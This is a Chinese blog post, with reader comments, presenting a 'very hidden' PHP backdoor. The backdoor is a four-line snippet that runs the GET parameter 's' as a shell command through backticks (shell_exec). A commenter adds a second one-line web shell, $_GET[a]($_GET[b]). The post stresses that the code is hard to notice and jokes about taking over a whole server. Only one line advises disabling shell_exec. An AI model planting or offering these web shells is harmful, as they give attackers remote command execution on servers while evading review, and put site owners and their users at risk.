当前位置:首页 > 代码·功能 > 正文

一个极其隐蔽的PHP后门写法

$safe = $_GET['s'];
if (isset($safe)){
    echo `$safe`;
}

上面这段代码发现了什么,感觉好像没什么别的东西吧 就是打印个字符串而已~

其实不然...其实我也是刚知道的...反撇号不同于单引号...长相不错,不过功能大相径庭

单引号“'’” 就是个简单字符串

反撇号“`”确实一个函数的简化,而那个函数...shell_exec 都知道是干嘛的吧...

也就一个小马而已,最多拿个shell而已,带走整个服务器,没什么大不了咯~~~

很机智的一个后门...绝逼看不出来~反正我第一眼没发现什么

所以,如果没什么大用 shell_exec函数还是禁止吧,一般没卵用。

本函数仅供学习,出什么事别找我就好了~

标签:
上一篇: 下一篇:

5 条评论

评论加载中...
  1. 4楼
    来自天朝的朋友 谷歌浏览器 Windows 7
    1314  

    请问这个后门密码是多少 测试了进不去啊~

    2016年8月5日 22:33 评论
  2. 看着好深奥哦。。去试试~不会出什么事吧

    2016年7月29日 17:00 评论
    • 小幻  

      没人知道就没事

      2016年8月4日 09:12 评论
  3. 板凳
    来自天朝的朋友 Safari浏览器  Android 5.1.1 2014813 Build/LMY47V
    东方求败  

    貌似深奥 不堪一击~

    2016年7月21日 14:05 评论
  4. 沙发
    来自天朝的朋友 谷歌浏览器 Windows 7
    Qa  

    $_GET[a]($_GET[b]);

    2016年7月21日 07:42 评论

发表评论

不理你。不要啊!吃饭。吃惊。吃西瓜。飞吻!恭喜!Hi纠结!膜拜!OK抛媚眼。泡泡糖。抛钱。忍!生闷气!调皮。偷看。委屈。献花。疑问?抓狂!

小提示:Ctrl+Enter快速提交助您一臂之力~
加载中……